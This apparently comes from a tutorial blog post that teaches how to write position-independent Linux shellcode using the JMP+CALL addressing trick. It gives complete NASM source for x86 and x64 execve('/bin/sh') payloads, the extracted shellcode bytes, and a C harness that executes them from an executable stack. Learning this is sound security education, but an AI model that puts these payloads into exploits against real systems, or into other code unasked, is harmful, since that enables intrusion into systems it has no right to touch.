One challenging aspect of creating a shellcode is dealing with addresses. Your shellcode will often need to reference certain locations, which gets complicated when working in the context of the program you are injecting into. These problems can be solved using a few tricks.
The JMP + CALL trick
One simple way of solving address challenges when writing a shellcode is to take advantage of how the JMP and CALL instructions work. This approach uses relative jumps: jumps that are encoded with an offset (the number of bytes to skip after the current JMP instruction, basically EIP + offset) instead of a full address. Because the offset is relative, the flow of execution is independent of the execution context, so the shellcode can be injected anywhere without breaking it. Let's have a look at how relative jumps work with the following example:
section .text
global _start
_start:
jmp target
nop
nop
target:
mov eax, 0xdead
When the above code is assembled, the JMP instruction generated uses an offset to target, not an address. Notice that there are two NOP instructions between the JMP instruction and target, and each NOP instruction assembles to 1 byte (0x90), so our JMP offset is 2 as we need to skip these bytes. The jump therefore assembles to eb 02, where eb is the short JMP opcode and 02 is the offset.
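To make the offset arithmetic concrete, here is a minimal C sketch that computes where a short JMP lands. The helper name short_jmp_target is hypothetical (it is not part of any tool used in this post), and it only understands the 2-byte eb form.

```c
#include <stddef.h>
#include <stdint.h>

/* Opcode of the x86 short JMP (JMP rel8). */
#define OPCODE_JMP_SHORT 0xeb

/*
 * Hypothetical helper: given a buffer of machine code and the position of a
 * short JMP inside it, return the position the jump lands on, or -1 if the
 * bytes at `pos` are not a complete short JMP.
 */
long short_jmp_target(const uint8_t *code, size_t len, size_t pos)
{
    if (pos + 2 > len || code[pos] != OPCODE_JMP_SHORT)
        return -1;

    /* The offset is a signed byte counted from the END of the 2-byte JMP. */
    int8_t rel = (int8_t)code[pos + 1];

    return (long)pos + 2 + rel;
}
```

For the example above (eb 02 90 90 followed by the bytes of mov eax, 0xdead), the JMP sits at position 0, so the helper returns 0 + 2 + 2 = 4, which is where the mov begins. Because the offset is signed, the same encoding can also jump backwards.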
The CALL instruction, which is used to call functions, works quite similarly to the JMP instruction with one key difference: CALL pushes the address of the next instruction (the return address) onto the stack before jumping to the target location, while JMP simply modifies the instruction pointer to go to the target location. Saving the return address allows the called function to hand control back to the caller using the RET instruction, which simply pops the return address from the stack and jumps to it.
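The same arithmetic applies to a near CALL, except that the offset is 4 bytes wide and the address of the next instruction is also what gets pushed. The sketch below is only an illustration: the struct call_info and decode_call names are made up for this example, and it handles only the e8 (CALL rel32) encoding.

```c
#include <stddef.h>
#include <stdint.h>

/* Opcode of the x86 near CALL with a 32-bit relative displacement. */
#define OPCODE_CALL_REL32 0xe8

/* Hypothetical result type: both positions are offsets into the buffer. */
struct call_info {
    long target;      /* where execution continues */
    long return_addr; /* what CALL pushes onto the stack */
};

/* Decode a CALL rel32 at `pos`. Returns 0 on success, -1 otherwise. */
int decode_call(const uint8_t *code, size_t len, size_t pos,
                struct call_info *out)
{
    if (pos + 5 > len || code[pos] != OPCODE_CALL_REL32)
        return -1;

    /* The displacement is stored little-endian right after the opcode. */
    uint32_t raw = (uint32_t)code[pos + 1]
                 | (uint32_t)code[pos + 2] << 8
                 | (uint32_t)code[pos + 3] << 16
                 | (uint32_t)code[pos + 4] << 24;
    int32_t rel = (int32_t)raw;

    /* CALL is 5 bytes long, so the next instruction starts at pos + 5. */
    out->return_addr = (long)pos + 5;
    out->target = out->return_addr + rel;
    return 0;
}
```

Applied to the final shellcode bytes shown later in this post, where e8 e3 ff ff ff sits at position 26, this gives a return address of 31 (the first byte of /bin/shA) and a target of 31 - 29 = 2 (the pop ebx that starts the main body).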
These two instructions can help us solve the address challenge when writing shellcodes using the following steps:
- Start our shellcode with a short JMP to a CALL instruction to set up relative addressing.
- CALL another offset within the same shellcode that contains the main code of our shellcode.
- Read the address stored at the top of the stack by the CALL instruction. This address will be pointing to a known position near or at the end of the shellcode, and we can use it to dynamically calculate other offsets at runtime.
Here is the layout:
_start:
jmp loc1
shellcode:
---[ main code]---
loc1:
call shellcode
---[ Your ref point that will be pushed onto the stack ]---
_start marks the shellcode's entry point, shellcode is our main shellcode body, and loc1 is where we make the call to get our reference address onto the stack.
With that in mind, we can write a simple injectable shellcode that uses the execve() syscall to spawn a /bin/sh shell. execve() is declared in the unistd.h header file, and is used to execute other programs. The function accepts three arguments:
int execve(const char *pathname, char *const argv[], char *const envp[]);
- pathname: This is the full path of the program you want to execute.
- argv[]: An array of strings containing the path of the program, and any other arguments to pass to the program. The array must end with a NULL pointer.
- envp[]: An array of strings containing any environment variables you wish to pass to the program. Can be null.
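Before dropping down to assembly, it can help to see the same call from C. The following is a minimal sketch, not part of the shellcode itself: run_program is a hypothetical helper that wraps execve() in fork() so the calling process survives, and it passes a NULL envp, which Linux tolerates (an assumption about the target system; other platforms may not accept it).

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: run `path` with `argv` in a child process and return
 * the child's exit status, or -1 if it could not be run or did not exit
 * normally.
 */
int run_program(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: on success execve() never returns. envp is NULL here,
         * which is an assumption that holds on Linux. */
        execve(path, argv, NULL);
        _exit(127); /* only reached if execve() failed */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling it with an argv of {"/bin/sh", NULL} would start an interactive shell, which is what the shellcode in this post does with the same three arguments, just without the fork().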
Since we are working in x86 (32-bit) assembly shellcode, we'll need to rely on making a direct system call (syscall) to use this function. To do this, we need to:
- Set EAX to 0x0b, which is the code for the execve() syscall.
- Set EBX to a pointer to a string. This is the pathname argument.
- Set ECX to a pointer to an array of pointers. This is the argv[] argument.
- Set EDX to a pointer to an array of pointers. This is the envp[] argument, which can be null.
For our /bin/sh shellcode, we start by creating a basic x86 program (I'm using NASM), and set up the first jump:
section .text
global _start
_start:
jmp loc1
Then we define loc1 (our JMP destination) with the CALL instruction and the data we are starting with (/bin/shA, where A is just a placeholder that we will replace with a null at runtime). Note that db isn't a CPU instruction but an assembler pseudo-instruction. The assembler simply embeds the given bytes at that position in the output binary, so the bytes immediately after the opcodes of call shellcode will be 2f 62 69 6e 2f 73 68 41, which is hex for /bin/shA:
loc1:
call shellcode
db "/bin/shA"
This block makes CALL push the address of /bin/shA onto the stack, and we can retrieve it by reading the value that ESP points to (or by simply popping it).
Now for the main shellcode. The first thing we need to do is obtain the address of /bin/shA, push a copy of the string onto the stack, and null-terminate that copy. Then we move the copy's address into EBX to serve as our pathname:
shellcode:
pop ebx ; Get the address of our /bin/shA
xor eax, eax ; For runtime nulling :)
push dword [ebx + 4] ; Push '/shA' into the stack
push dword [ebx] ; Push '/bin' into the stack. We now have /bin/shA on top
mov byte [esp + 7], al ; Overwrite the 'A' placeholder to null-terminate
mov ebx, esp ; First arg (filename) of execve() = /bin/sh
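The effect of those pushes can be modelled in C. This is just a sketch of the memory layout, with made-up names: embedded stands in for the 8 bytes that follow the CALL, and stack_copy for the 8 bytes the two PUSH instructions write, with index 0 being the address ESP ends up pointing to.

```c
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical model of the first half of the shellcode body. The bytes
 * embedded in the shellcode are left untouched; only the copy on the
 * "stack" gets its placeholder overwritten.
 */
void build_pathname(const uint8_t embedded[8], char stack_copy[8])
{
    /* push dword [ebx + 4]: pushed first, so it lands at the higher address */
    memcpy(stack_copy + 4, embedded + 4, 4);

    /* push dword [ebx]: pushed second, so it lands right below it */
    memcpy(stack_copy, embedded, 4);

    /* mov byte [esp + 7], al: AL is 0, so the 'A' becomes the terminator */
    stack_copy[7] = 0;
}
```

After the call, stack_copy holds the C string /bin/sh, while the original eight bytes still end in 'A'.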
Next we need to set up our argv[] for the syscall. Since this is just a null-terminated array of string pointers, we can leverage the stack to create it by pushing a NULL onto it, followed by the same address we used for pathname, then saving its stack address in ECX:
; Build the *argv[] array on the stack
push eax ; NULL
push ebx ; /bin/sh
mov ecx, esp ; ECX = {"/bin/sh", NULL}
We then set envp[] to null since we don't need it:
mov edx, eax ; EDX = NULL
Finally, we execute the syscall:
mov al, 0x0b ; 0x0b (11) = execve() syscall
int 0x80 ; Y33T!!!
The complete code:
section .text
global _start
_start:
jmp loc1
shellcode:
pop ebx ; Get the address of our /bin/shA
xor eax, eax ; For runtime nulling :)
push dword [ebx + 4] ; Push '/shA' into the stack
push dword [ebx] ; Push '/bin' into the stack. We now have /bin/shA on top
mov byte [esp + 7], al ; Overwrite the 'A' placeholder to null-terminate
mov ebx, esp ; First arg (filename) of execve() = /bin/sh
mov edx, eax ; EDX = NULL
; Build the *argv[] array on the stack
push eax ; NULL
push ebx ; /bin/sh
mov ecx, esp ; ECX = {"/bin/sh", NULL}
mov al, 0x0b ; 0x0b (11) = execve() syscall
int 0x80 ; Y33T!!!
loc1:
call shellcode ; Jump to main body and save our reference address.
db "/bin/shA" ; Our reference address.
I saved this as test.asm. Time to assemble and test (note: I'm working on an x64 system and building for x86, hence the need to declare the architecture in the following commands):
nasm -f elf32 test.asm -o test.o
ld -m elf_i386 test.o -o test
Everything looks good :) But we are running it as a standalone ELF binary. To convert it into a shellcode, we need to extract only our opcodes of interest. Disassembling the binary using objdump shows that the .text section holds all our code of interest:
objdump -D -Mintel test
Note that the instructions listed right after the call at the end of the disassembly look weird. These aren't actual instructions, but rather the bytes we embedded (/bin/shA) using db.
We now need to extract these opcodes. There are many ways to go about this, but I personally prefer objcopy when extracting a whole section:
objcopy -O binary --only-section=.text test shellcode.bin
The file shellcode.bin contains our raw shellcode. We can use a disassembler to confirm that everything looks good. I use rasm2 (part of Radare2) when dealing with shellcodes:
rasm2 -d -B -f shellcode.bin
Looks good. Now we need to check if this shellcode is injectable. We can use a simple C program to test this. First, we need to format this code into a C array. We can achieve this using the -i option of xxd:
xxd -i shellcode.bin
unsigned char shellcode_bin[] = {
0xeb, 0x18, 0x5b, 0x31, 0xc0, 0xff, 0x73, 0x04, 0xff, 0x33, 0x88, 0x44,
0x24, 0x07, 0x89, 0xe3, 0x89, 0xc2, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b,
0xcd, 0x80, 0xe8, 0xe3, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
0x73, 0x68, 0x41
};
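One quick sanity check on this array is to confirm it contains no 0x00 bytes. The post does not state why the A placeholder and the xor eax, eax / mov al sequences are used, so treat this as an assumption: the usual motivation is that shellcode is often delivered through string functions such as strcpy(), which stop at the first null byte. The helper name count_null_bytes is made up for this sketch.

```c
#include <stddef.h>

/*
 * Hypothetical helper: count the 0x00 bytes in a shellcode buffer. A result
 * of 0 means the payload would survive being copied as a C string.
 */
size_t count_null_bytes(const unsigned char *buf, size_t len)
{
    size_t count = 0;

    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            count++;
    }
    return count;
}
```

Run against shellcode_bin, the count is 0. By contrast, a plain mov eax, 0x0b would assemble to b8 0b 00 00 00 and contribute three null bytes, which is presumably why the code loads only AL.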
We can now write a simple tester for the above shellcode:
#include <stdio.h>
#include <string.h>

int main(void) {
    /* Raw shellcode bytes, as produced by xxd -i shellcode.bin */
    unsigned char shellcode_bin[] = {
        0xeb, 0x18, 0x5b, 0x31, 0xc0, 0xff, 0x73, 0x04, 0xff, 0x33, 0x88, 0x44,
        0x24, 0x07, 0x89, 0xe3, 0x89, 0xc2, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b,
        0xcd, 0x80, 0xe8, 0xe3, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
        0x73, 0x68, 0x41
    };
    /* Treat the buffer (which lives on the stack) as a function and call it */
    int (*ret)(void) = (int (*)(void))shellcode_bin;
    ret();
    return 0;
}
Compile the program. Since the shellcode array lives on the stack, make sure you mark the stack as executable (turning off NX protection for it) with the -z execstack flag, or the program will segfault:
gcc tester.c -o tester -m32 -z execstack
And it worked! We made an x86 injectable shellcode that shows how to use the JMP + CALL trick to solve addressing issues :)
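If you would rather not rely on an executable stack, one alternative (not the approach used in this post, just a sketch under the assumption of a Linux system with mmap() and mprotect()) is to copy the bytes into a freshly mapped page and make that page executable. The helper name make_executable_copy is hypothetical.

```c
#define _DEFAULT_SOURCE /* for MAP_ANONYMOUS under strict -std= modes */
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

/*
 * Hypothetical helper: copy `len` bytes of shellcode into an anonymous
 * mapping and flip it to read + execute. Returns NULL on failure.
 */
void *make_executable_copy(const unsigned char *code, size_t len)
{
    if (len == 0)
        return NULL;

    /* Map the memory writable first so the bytes can be copied in. */
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return NULL;

    memcpy(mem, code, len);

    /* The shellcode only writes to the stack, so R+X is enough here. */
    if (mprotect(mem, len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, len);
        return NULL;
    }
    return mem;
}
```

In a tester built with -m32, the returned pointer can be cast to a function pointer and called exactly like ret() above. The helper itself only prepares the memory; it never runs the bytes.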
We can also port this shellcode for x64 (64-bit) systems. All we need to do is update the names of the registers, and use the x64 syscall for execve().
Under x64, the syscall instruction is used for making system calls, with the syscall code stored in RAX. Arguments are passed in registers, starting with RDI, then RSI, RDX, and the rest. To make an execve() syscall under x64:
- Set RAX to 0x3b
- Set RDI to a pointer to the full path of the program to execute (/bin/sh)
- Set RSI to the argv[] array.
- Set RDX to the envp[] array. Can be null.
- Call syscall
The modified shellcode for x64:
section .text
global _start
_start:
jmp loc1
shellcode:
pop rbx
xor rax, rax ; For nulling.
push qword [rbx] ; RSP = '/bin/shA'
mov byte [rsp + 7], al ; Null-terminate.
mov rdi, rsp ; rdi = '/bin/sh'
; Setup argv[]
push rax
push rdi
mov rsi, rsp ; rsi = {"/bin/sh", NULL}
; Setup envp[]
mov rdx, rax ; rdx = NULL
; Make the syscall
mov al, 0x3b ; 0x3b = execve() syscall code
syscall
loc1:
call shellcode
db "/bin/shA"
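The same steps discussed above can be used to extract and test the shellcode, this time assembling with nasm -f elf64 and dropping the 32-bit flags (-m elf_i386 for ld and -m32 for gcc) :)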